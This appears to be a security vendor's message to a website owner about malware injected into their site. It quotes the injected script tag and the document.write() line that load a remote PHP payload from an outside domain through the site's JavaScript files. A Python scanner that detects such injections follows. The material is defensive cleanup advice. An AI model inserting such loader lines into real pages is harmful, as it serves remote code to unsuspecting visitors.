Hello :-),
Jaal Scan ID # 390390252749-825 output
Malicious code detected on line 7 of www.coastalcashexchange.com
starts with
<!—Scr ipts/AC_RunActive Content.js>
Please look at the copy of the page on the server. If you cannot locate this code, it is probably being injected at runtime, when a user is requesting the page. It might be useful to then wipe out the hosting directory and check for malware, on the server and in the backend database. You can also ask for help from your hosting provider. Please check out other pages too.
If you have any specific issues feel free to ask for help.
Also, I am collecting info from people affected by attacks like this. If it would be possible for you to share your experience, could you kindly shoot me a mail at a.banerje e @ s top the hac ker .com (please remove the spaces).
We also provide vulnerability identification and mitigation services to help keep websites from being infected in the first place.
It might be useful to go through my blog post:
http://www.stopthehacker.com/2009/10/28/when-benign-scripts-attack/
Hope this helps,
-A
Dr. Anirban Banerjee,
Jaal LLC, Riverside, CA.
Site: www.stopthehacker.com
Blog: www.stopthehacker.com/blog
Jaal: Protecting the Internet, one website at a time™
This line is present in your files
<sc ript src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php >
located between the </head> and <body> tags. If you do not see it in the source for your pages it is being inserted when the page is requested.
It is also present in your javascript files such as
http://www.coastalcashexchange.com/Scripts/AC_RunActiveContent.js
http://www.coastalcashexchange.com/Scripts/swfobject_modified.js
http://www.coastalcashexchange.com/SpryAssets/SpryMenuBar.js
by the line(s)
document.write(‘<scr ipt
src=http://worphueser.de/032c0698b3108c214/032c0698b31084b13.php ><\/script>’);
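As an added example (not code from either poster or from Jaal), a small scanner for the two placements described above: a script tag sitting between </head> and <body>, and a document.write() line in a .js file that emits a script tag. The host names, sample strings and function names are constructed for illustration, and own_hosts is an assumed allowlist of the site's own domains.

```python
import re
import sys
from pathlib import Path
from urllib.parse import urlparse

# <script ... src=URL>, with the src value quoted or unquoted
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# Text between </head> and <body>, where no markup normally belongs
HEAD_BODY_GAP = re.compile(r"</head\s*>(.*?)<body\b", re.I | re.S)
# Argument of document.write(...) / document.writeln(...)
DOC_WRITE = re.compile(r"document\.write(?:ln)?\s*\((.*?)\)", re.I | re.S)
ABSOLUTE = re.compile(r"(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def offsite(url, own_hosts):
    """True when url names a host outside own_hosts; relative paths are same-site."""
    if not ABSOLUTE.match(url):
        return False
    host = urlparse(url).hostname
    return host is not None and host.lower() not in own_hosts

def scan_text(text, is_js, own_hosts):
    """Return off-site script URLs found in the suspicious region of one file."""
    regions = (DOC_WRITE if is_js else HEAD_BODY_GAP).findall(text)
    return [u for r in regions for u in SCRIPT_SRC.findall(r) if offsite(u, own_hosts)]

def scan_tree(root, own_hosts):
    """Scan .js/.html/.htm/.php files under root; map file path -> URLs found."""
    findings = {}
    for path in Path(root).rglob("*"):
        suffix = path.suffix.lower()
        if path.is_file() and suffix in {".js", ".html", ".htm", ".php"}:
            hits = scan_text(path.read_text(errors="replace"), suffix == ".js", own_hosts)
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed samples (injected.example is a placeholder host)
SAMPLE_HTML = ("<html><head><script src=\"Scripts/menu.js\"></script></head>\n"
               "<script src=http://injected.example/a1/b2.php ></script>\n"
               "<body><p>hello</p></body></html>")
SAMPLE_JS = ("function menu() { return 1; }\n"
             "document.write('<script src=http://injected.example/a1/b2.php ><\\/script>');")

if __name__ == "__main__":
    own = {"www.example.com"}  # assumption: replace with the site's own host names
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, urls in scan_tree(root, own).items():
        print(name, urls)
```

If the files on disk come back clean but the served page still carries the tag, run scan_text over the HTML as fetched from the live site, since that points to insertion at request time rather than a modified file.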



